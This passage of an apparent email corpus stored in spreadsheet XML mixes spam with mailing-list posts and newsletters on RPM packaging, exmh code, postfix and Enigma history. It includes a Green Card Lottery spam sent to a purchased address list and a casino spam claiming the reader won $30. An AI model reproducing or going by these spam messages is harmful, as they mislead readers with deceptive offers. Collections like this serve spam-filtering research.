 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=3&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/mail/lang_fr.gif" width="85" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=5&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/mail/lang_se.gif" width="85" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=6&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/mail/lang_dk.gif" width="80" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;img src="http://www.divl.com/images/mail/lang_spacer.gif" width="10" height="21"&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;TABLE cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;TR&gt;
 &lt;td rowspan="4"&gt;&lt;img src="http://www.divl.com/images/trans.gif" width="35" height="1"&gt;&lt;/TD&gt;
 &lt;TD colspan="3"&gt;&lt;img src="http://www.divl.com/images/trans.gif" width="1" height="20"&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD width="370" valign="top"&gt;
 &lt;FONT FACE="verdana, arial, helvetica" size="1" color="#000000"&gt;
 &lt;img src="http://www.divl.com/images/mail/txt_win0.gif" width="371" height="43" border="0"&gt;
 &lt;BR&gt;
 &lt;A HREF="http://www.divl.com/application.asp?L=0&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/btn_apply_today0.gif" width="103" height="17" border="0"&gt;&lt;/A&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;img src="http://www.divl.com/images/txt_theofficial0.gif" width="196" height="18" border="0"&gt;&lt;BR&gt;
 The United States has a program, called Diversity Immigrant Visa
 Lottery (better known as the Green Card Lottery), making available
 each year by random selection 50,000 permanent residence visas
 (Green Cards) to people from around the world. The objective of the
 program is to issue Green Cards to individuals born in countries with
 historically low levels of immigration to the United States.
 &lt;BR&gt;&lt;BR&gt;
 &lt;img src="http://www.divl.com/images/txt_whatis0.gif" width="144" height="18" border="0"&gt;&lt;BR&gt;
 A Green Card is a Permanent Residence Visa of the U.S.A. A Green Card
 will give you legal right to work and live permanently in the United
 States. Green Card holders receive health, education, and several other
 benefits. If you win a Green Card, you can apply for U.S. Citizenship at
 a later time. The Green Card does not affect your present citizenship.
 You and your family could be lucky winners!
 &lt;BR&gt;&lt;BR&gt;
 &lt;A HREF="http://www.divl.com/application.asp?L=0&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/btn_apply_today0.gif" width="103" height="17" border="0"&gt;&lt;/A&gt;
 &lt;/FONT&gt;
 &lt;/TD&gt;
 &lt;TD width="35"&gt;
 &lt;img src="http://www.divl.com/images/trans.gif" width="35" height="1" border="0"&gt;
 &lt;/TD&gt;
 &lt;TD width="122" valign="top"&gt;
 &lt;img src="http://www.divl.com/images/mail/happypeople.gif" width="120" height="120" border="0"&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colspan="3"&gt;
 &lt;img src="http://www.divl.com/transView.asp?CID=86" width="1" height="20" border="0"&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD align="center"&gt;
 &lt;TABLE width="522" cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;FONT FACE="verdana, arial, helvetica" size="1" color="#000000"&gt;
 &lt;BR&gt;&lt;BR&gt;
 Your email address was obtained from a purchased list, Reference # 00193.  If you wish to unsubscribe
 from this list, please &lt;a href="http://www.divl.com/unsubscribe.asp?CID=86"&gt;Click Here&lt;/a&gt;.
 If you have previously unsubscribed and are still receiving this message, you may email our
 &lt;a href="mailto:nospamws@yahoo.com?Subject=Abuse Report"&gt;Abuse Control Center&lt;/a&gt;, or call 1-888-763-2497,
 or write us at: NoSpam, 6484 Coral Way, Miami, FL, 33155.&lt;BR&gt;&lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;/FONT&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;
 &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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On Wed, 2002-09-18 at 17:50, Matthias Saou wrote:
 &gt; I think I'll use this "--with &lt;whatever&gt;" switch more and more where
 &gt; possible.
 Nifty, I've been thinking about that too.  Any good ideas how to
 document those targets?  %description?
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "f" == fork list &lt;Mr.&gt; writes:
     f&gt; "Free trade and free markets have proven their ability to lift
     f&gt; whole societies out of poverty" I'm not a
     f&gt; socio-political/history buff - does anybody have some clear
     f&gt; examples?
 China?  Ooops, no wait, scratch that.
 There is one counter example that I can think of, but it may not be
 precisely "free trade/markets" -- when Ben Franklin first visited
 England he was asked why the colonies were so prosperous.  Ben
 explained that they used "Colonial Script", a kind of barter-dollar,
 and increasing the supply of script ensured complete employment.  The
 British bankers were furious and immediately lobbied parliament to
 clamp down on the practice.  Within a few years, the colonies were
 rife with unemployment and poverty just like the rest of the Empire.
 According to questionable literature handed out by a fringe political
 party here in Canada, the Founding Fathers had no real complaint about
 tea taxes, it was the banning of colonial script they were
 protesting. If this is true, then it comes right back to the forces
 that killed Ned Ludd's followers as to why popular opinion believes
 they were protesting a tea tax.  The same pamphlet claimed that Canada
 was also a prosperous nation until, by an act of parliament in the
 late-50's or early 60's, the right to print money was removed from the
 juristiction of parliament and handed over to the Bank of Canada.
 I've wondered about all this.  Certainly the timeline of the collapse
 of the Canadian economy fits the profile, but there are oodles of
 other causes (for example, spending money like we had 300M people when
 we only had 20M) Anyone have any further information on this?
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Astrology.com: daily horoscope
</t>
  </si>
  <si>
    <t xml:space="preserve">-----------------------------------------------------------------
                          Back to school!
            Find out what's in store for September with
                a One Month Forecast for only $4.95!
   http://www.chartshop.com/scripts/runisa.dll?AO:495SHOP::DAILY
 -----------------------------------------------------------------
 Greetings  --
 Here is your horoscope for Saturday, August 31:
 August is over, and Aquarius is looking forward to next month's new 
 season. Excitement is tinged with anticipation. A relationship benefits 
 wonderfully from your current surge of vitality.
 Until tomorrow,
 Kelli Fox, Your Astrologer
 http://www.astrology.com
 http://www.chartshop.com
 http://www.ivillage.com
 Sneak a peek at the future with tomorrow's horoscope! 
 http://horoscopes.astrology.com/index/dailyindextom.html
 -----------------------------------------------------------------
                       Looking for Mr. Right?
             Take this quiz to narrow down your search.
      http://quiz.ivillage.com/astrology/tests/mrrightquiz.htm
 -----------------------------------------------------------------
 If you do not wish to continue receiving your daily horoscope
 by email, please click on the following link.
 http://www.astrology.com/unsubscribe/dailyhoroscope.html
 If you would like to edit your current information or add more signs, 
 please click on the following link, or copy and paste it to your web 
 browser.
 http://www.astrology.com/freedaily/
 If you choose to reply to this message, please include the following lines 
 in the body of your email:
 email recipient: mothlight@fastmail.fm
 ---
 annmn:[73eyn03eyn4prCg0120022u003eyn0mHe4BHe7m]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Webmaster Weekly]  Educational Capabilities
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/webmaster/20020719.html"&gt;
       http://www.lockergnome.com/issues/webmaster/20020719.html
       &lt;/a&gt;
       To unsubscribe, please e-mail the following address:
       leave-lgweb-2534373J@sprocket.lockergnome.com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#14367A }
  a:link    { COLOR: #008000; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #003E00; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { COLOR: #000000; text-decoration: none }
  a:hover   { color: GRAY; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #FF9700; BORDER-BOTTOM: #E08A00 4px solid; BORDER-LEFT: #FFB03F 4px solid; BORDER-RIGHT: #E08A00 4px solid; BORDER-TOP: #FFB03F 4px solid; COLOR: #4C2E00; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #FF9700; TEXT-ALIGN: center; BORDER-BOTTOM: #E08A00 3px solid; BORDER-LEFT: #FFB03F 3px solid; BORDER-RIGHT: #E08A00 3px solid; BORDER-TOP: #FFB03F 3px solid; COLOR: #4C2E00; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold } 
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;
 &lt;title&gt;20020719 Sausage Sizzler - Lockergnome - Webmaster Weekly&lt;/title&gt;&lt;/head&gt;
 &lt;body   MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" bgcolor="#FFFFFF"   style="BACKGROUND-POSITION: right top; BACKGROUND-REPEAT: no-repeat" MARGINWIDTH="0" LEFTMARGIN="0" rightmargin="0" text="#4C2E00" alink="#000000" link="#008000" vlink="#003E00"&gt;
 &lt;!-- background="http://images.lockergnome.com/images/bg.head.gray.gif" bgcolor="#C0C0C0" left width="610" background="http://images.lockergnome.com/images/back.top-r1.gif"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&lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;!-- WebREPORT --&gt;
 &lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;
 &amp;nbsp;07.19.2002 WebREPORT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font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This year's &lt;a href="http://www.sic.org"&gt;SIC&lt;/a&gt; gets the blame for the 
 lateness of this issue. Lori and I spent Wednesday thru Sunday meeting 
 software authors, participating in educational sessions, viewing product 
 demonstrations, and most of all having fun. This was Lori's second trip 
 to an SIC conference, so she got to reacquaint herself with many familiar 
 faces, while I was getting to put faces with many people I've exchanged 
 e-mails with over the last several years. As much as I enjoy information 
 exchange via computer, the human interaction of meeting people and 
 sharing ideas and stories face-to-face is priceless.
 &lt;p&gt;
 One cool discovery at this year's SIC, pertaining directly to Webmasters, 
 is Nick Bradbury's release of 
 &lt;a href="http://www.bradsoft.com/topstyle/index.asp"&gt;TopStyle 3.0&lt;/a&gt;. 
 Nick's the guy who created HomeSite, long before it joined the Macromedia 
 family of products. Version 3 represents a return to those HTML editing 
 roots, with the addition of editing capabilities now functioning 
 hand-in-hand with the rock solid style sheet building features that 
 previously defined  TopStyle. Conversion of existing font tags to CSS is 
 just one of several new additions. I should have a full review in one of 
 the next two issues.
 &lt;p&gt;
 Also in the coming soon category - a GnomeTome on Cold Fusion, written by 
 one of Iowa's resident ColdFusion experts (who also happens to be an 
 expert on an International level), Kevin Schmidt. Kevin wrote the 
 &lt;a href="http://www.amazon.com/exec/obidos/ASIN/0201758474/ref=ase_lockergnome""&gt;Training From the Source&lt;/a&gt; 
 book on Cold Fusion 5 and is currently writing a revision for 
 ColdFusionMX. The GnomeTome means we'll have a nice pairing of tips for 
 both static pages, in the form of 
 &lt;a href="http://www.gnometomes.com/tome/001691.html"&gt;Dreamweaver tips&lt;/a&gt;, and tips on dynamic 
 site development with Kevin's tips on ColdFusion.
 &lt;p align="right"&gt;&lt;font style="font-size: 22pt" face="Jake Ludington, Chris Pirillo, Comic Sans MS" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;
 &lt;!-- MAIL --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeMAIL&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Email 911&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.email911.com"&gt;http://www.email911.com&lt;/a&gt;&lt;p&gt;
 E-mail remains the killer app of the Internet, despite all the incredible 
 artistic efforts by many Web designers. As we all know, e-mail is also a 
 source of great frustration and misuse - turning otherwise likeable folks 
 into enemies of your inbox defense system. Email 911 aims to educate the 
 ignorant, while aiding those of us with a reasonable understanding of 
 effective e-mail communication in ways to make e-mail even more useful. 
 The newsletters and discussions affiliated with this site should be 
 required reading for all corporate users, although home users would most 
 certainly benefit as well. For an exceptional look at eliminating junk 
 from your inbox, check out the e-book "What Can I Do About Spam?"
 &lt;br&gt;&lt;br&gt;
 &lt;!-- TOOLS --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeTOOLS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;ApacheConf v2.0 [1.1MB] W9X/NT/W2K/XP $19.95&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.zecos.com/apacheconf/index.html"&gt;http://www.zecos.com/apacheconf/index.html&lt;/a&gt;&lt;p&gt;
 Configure your Apache httpd.conf file in a visual environment instead 
 of a text editor. This tool provides a visual representation of all 
 configurable options available to Apache admins, offering great 
 learning capabilities for newer webmasters, as well as saving time for 
 experienced administrators who tire of scrolling through screen after 
 screen of configurations. A source view makes manual editing of the 
 file easier, by bolding and coloring various configuration directives, 
 similar to the way HTML editors mark code. Avoid typos with built-in 
 error checking, which provides warnings when invalid directives are 
 used.
 &lt;!-- SERVER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSERVER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Latest kbALertz for Webmaters&lt;/b&gt;&lt;p&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q324098"&gt;Q324098 - File Download Dialog Box Appears After You Turn Off File Downloads (Q324098)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q325216"&gt;Q325216 - WebCast: Administrating Internet Explorer in Windows 2000 (Q325216)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q265288"&gt;Q265288 - FP2000: Themes Dialog Box Flashes and Then Disappears (Q265288)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q321156"&gt;Q321156 - FtpPutFile Returns Success Although the Operation Fails in Internet Explorer (Q321156)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q264951"&gt;Q264951 - FP2000: Error 2 When You Attempt to Open Registry Key in FrontPage (Q264951)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt; 
 &lt;!-- Middle Ad --&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;TURBO-CHARGE YOUR FTP EXPERIENCE:&lt;/b&gt; TurboFTP is a fully automated 
 FTP client to make your Internet file transfer fast and efficient. It 
 offers a straightforward dual-pane view that covers both a local folder 
 and a remote directory. TurboFTP offers strong interruption and stall 
 protection. It also allows you to drag and drop from Windows Explorer. 
 TuroboFTP also includes firewall compatibility and comes with a handy 
 Address Book for convenient organization of your FTP sites. 
 &lt;a href="http://www.SellShareware.com/ProgramInfo.asp?AfID=10519&amp;PrID=36767"&gt;Get Your FREE Trial Now&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- USABILITY --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeUSABILITY&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Making A Commercial Case for Adopting Web Standards&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.maccaws.com/"&gt;http://www.maccaws.com/&lt;/a&gt;&lt;p&gt;
 Supporting standards and writing good code are often things that the number 
 crunchers in a business don't feel are as important, when compared against 
 getting the product to as many people as possible in the shortest amount of 
 time possible in an effort to generate revenue. Communicating the 
 importance of standards and good code can be an uphill battle; after all, 
 you're just a programmer, right? MACCAWS aims to make your job easier, via 
 an open discussion on the establishment of standards that will make sense 
 to the folks who control the bottom line. Their mission is to educate 
 business leaders by providing you the end user with tools that will help 
 make a case for applying standards to your Web efforts. If you've got a 
 voice you'd like to add to their cause, visit them on the Web and help 
   influence the course of Web standards development.
 &lt;!-- BLOG --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeBLOG&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;WAPBLOGGER&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.ubique.ch/wapblogger/"&gt;http://www.ubique.ch/wapblogger/&lt;/a&gt;&lt;p&gt;
 Post to your blog via a WAP enabled device with the assistance of this 
 interface, designed by "some Swiss guy called Niklaus. As long as your 
 blogging tool supports the Blogger API (most do), you'll have no problem 
 updating your online thoughts, no matter where in the world you may be. 
 Use a WAP browser from your Palm, Pocket PC, or even a cell phone. The 
 service is currently free, hosted by Niklaus at his personal site. The 
 site FAQ offers great suggestions for adding posts while keeping 
 connection charges to a minimum. 
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/webmasterweekly/20020719.html"&gt;http://www.lockergnome.com/issues/webmasterweekly/20020719.html&lt;/a&gt;&lt;br&gt;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HREF="http://www.gnomedex.com/"&gt;$99 Tech Conference&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;center&gt;
 &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;&lt;img alt="See You in August!" src="http://chris.pirillo.com/archives/Gnomedex_Banner_going.gif" width="120" height="60" border="0"&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://store.lockergnome.com"&gt;The GnomeSTORE&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Tell a Friend About Us!&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/submit.html"&gt;Suggest a Feature&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/advertise.html"&gt;Advertise With Us&lt;/a&gt;&lt;br&gt;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href="mailto:jake@lockergnome.com?subject=Webmaster Weekly"&gt;E-mail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 bgcolor="#B6EB8F"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;CREDITS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &amp;copy;2002, Sausage Software and Lockergnome LLC. All Rights Reserved. Nathan Allan, the Sausage Crew and Lockergnome Lunatics spin all the content. Please read our &lt;a href="http://www.lockergnome.com/terms.html"&gt;Terms of Service&lt;/a&gt;.
 &lt;!-- FUNNY COMMENT    --&gt;
 &lt;/font&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;Search Past Issues:&lt;br&gt;
 &lt;img src="http://www.lockergnome.com/images/blank.gif"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&lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#FFEEDD"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&lt;table cellpadding="5" cellspacing="1" border="0"&gt;&lt;tr&gt;&lt;td title="Click These Links to find your DREAM JOB!"&gt;&lt;font style="font-size: 8pt; font-family: Verdana"&gt;
 &lt;center&gt;&lt;b&gt;GETTING PAID WHAT YOU ARE WORTH?&lt;/b&gt;&lt;p&gt; Change your career - or get a better one! Your &lt;a href="http://www.lockergnome.com/jobs.html"&gt;dream job&lt;/a&gt; could be a mouse click away. Visit our &lt;a href="http://www.lockergnome.com/jobs.html"&gt;job search&lt;/a&gt; page for a position with a future.&lt;p&gt; &lt;a href="http://www.lockergnome.com/jobs.html"&gt;Find a new career&lt;/a&gt; today!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; US listers will recognise Damian Lewis as Lieutenant/Captain/Major 
 &gt; Winters from "Band of Brothers" which is annoying as he was one of 
 &gt; the actors I was sure was actually american.  I wouldn't be 
 surprised 
 &gt; now if someone told me they were all british actors...
 &gt; 
 &gt; Stew
 I was watching that last night and I couldn't help wondering if one 
 of the GIs was Dexter Fletcher out of the Crystal Maze. Does this 
 mean it could actually have been him?
 timh
 Who once snogged Shauna Lowery, if anyones heard of her. 
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Chris said:
 &gt; 
 &gt; I can tell you what the 'clear' and 'del' arguments mean:
 &gt; 
 &gt; Mh_SequenceUpdate lists/l-k clear cur {} public
 &gt; 	This means to clear the 'cur' sequence for lists/l-k
 &gt; 
 &gt; Mh_SequenceUpdate lists/l-k del unseen 5400 public
 &gt; 	This means to delete message 5400 from the 'unseen' sequence for lists/l-k
 &gt; 
 &gt; Can you explain more what you were actually doing as this occurred?  This 
 &gt; doesn't appear to be background processing.  Is there significance to message 
 &gt; 5400?  Is it the one that isn't displaying?
 &gt; 
 &gt; Chris
 After sending the report I started fiddling with the Ftoc_RescanLine 
 stuff and I havn't seen it since. I can't really tell if it was my 
 hacking that removed it, or if it was some transitional magic 
 happening since this was the first invocation of that version of 
 exmh. I've backed out my stuff now, and'll let you know if it happens 
 again.
 On another thing with the Ftoc_RescanLine stuff. This routine is 
 called at times still unclar to me. An inspection of the routine 
 suggests that it is used in the transition of a message to/form 
 "current" state to re-paint the ftoc line. However, checking the 
 msg.tcl code (MSgChange) we find:
     if {$msgid != {}} {
         # Allow null msgid from Msg_ShowWhat, which supplies line 
 instead
         if {$msgid &lt; 0}  return
     } else {
         # line null too, try using first in folder
         if {[string length $line] == 0} { set line 1 }
         set msgid [Ftoc_MsgNumber [Ftoc_FindMsg $msgid $line]]
     }
     Ftoc_ClearCurrent
     Mh_SetCur $exmh(folder) $msgid
     Ftoc_ShowSequences $exmh(folder)
 The Ftoc_ClearCurrent calls Ftoc_RescanLIne to clear the '+' sign 
 _before_ the on-disk transition is made. I hacked this stuff and more 
 or less changed the order. It works, but fails on some folder changes.
 My feeling of this is that we really do not want to have a 
 Ftoc_ClearCurrent, but rather just a RescanLine and the caller had 
 better know the line or msgid. That routine shoud just put in the '+' 
 if the line/msg in question happened to be the cur msg. Thoughts?
 /Anders
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: P2P slogans for EFF
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485619
 Date: Not supplied
 EFF is looking for a few good slogans! We're getting some banners made up to 
 place on P2P network clients, with slogans like, "P2P Has a Posse." We need 
 more. Mail your suggestions to kevin@eff.org or post to the discuss link. Link
 [1] Discuss[2]
 [1] mailto:kevin@eff.org
 [2] http://www.quicktopic.com/boing/H/ybym9WMbmNDEx
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Date: Thu, 03 Oct 2002 03:21:05 +1000
 To: "John S. Denker" &lt;jsd@monmouth.com&gt;
 From: Greg Rose &lt;ggr@qualcomm.com&gt;
 Subject: Re: Optical analog computing?
 Cc: "R. A. Hettinga" &lt;rah@shipwright.com&gt;,
    Digital Bearer Settlement List &lt;dbs@philodox.com&gt;,
    cryptography@wasabisystems.com
 At 01:30 AM 10/2/2002 -0400, John S. Denker wrote:
 &gt;"R. A. Hettinga" wrote:
 &gt;...
 &gt; &gt; "the first computer to crack enigma was optical"
 &gt;1) Bletchley Park used optical sensors, which were (and
 &gt;still are) the best way to read paper tape at high speed.
 &gt;You can read about it in the standard accounts, e.g.
 &gt;   http://www.picotech.com/applications/colossus.html
 But Colossus was not for Enigma. The bombes used for Enigma were
 electro-mechanical. I'm not aware of any application of optical techniques
 to Enigma, unless they were done in the US and are still classified. And
 clearly, the first bulk breaks of Enigma were done by the bombes, so I
 guess it depends whether you count bombes as computers or not, whether this
 statement has any credibility at all.
 Greg.
 Williams/Zenon 2004 campaign page: http://www.ben4prez.org
 Greg Rose                                       INTERNET: ggr@qualcomm.com
 Qualcomm Australia          VOICE:  +61-2-9817 4188   FAX: +61-2-9817 5199
 Level 3, 230 Victoria Road,                http://people.qualcomm.com/ggr/
 Gladesville NSW 2111    232B EC8F 44C6 C853 D68F  E107 E6BF CD2F 1081 A37C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</si>
  <si>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Re: [ILUG] postfix
</t>
  </si>
  <si>
    <t xml:space="preserve">hrishy's [hrishys@yahoo.co.uk] 22 lines of wisdom included:
 &gt; Hi All
 &gt; 
 &gt; 
 &gt; I ahd some users test1 test2 etc.i deleted their
 &gt; mailboxes from /var/mail/test1 etc.now the postfix
 &gt; queue seems to be huge can anybody help what could be
 &gt; wrong
 Some logs might be of some help.
 1) some output of /var/log/maillog with some relevant error message
 (that could be /var/log/mail.log or some other log depending on your
 configuration)
 2) the output from ``postconf -n''
 On another note, you did recreate the mailboxes, didn't you?
 -- 
   Philip Reynolds        
    RFC Networks          tel: 01 8832063
 www.rfc-networks.ie      fax: 01 8832041
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hi Kathy, are you and your friend coming over?                   A
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor=3D"#003300"&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT color=3D#ffffff size=3D5&gt;Congratulations, 
 You Won $30 Free&lt;BR&gt;Today At The Internet's Best &amp;amp; Most&lt;BR&gt;Trusted On-=
 Line 
 Casino!&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT color=3D#669966&gt;&lt;FONT color=3D#ffffff size=3D4&gt;To =
 Collect Your 
 $30 Cash &lt;/FONT&gt;&lt;A 
 href=3D"http://www.cyberxcasino.com"&gt;&lt;FONT 
 size=3D4&gt;Click Here!&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;A 
 href=3D"http://www.cyberxcasino.com"&gt;&lt;IMG 
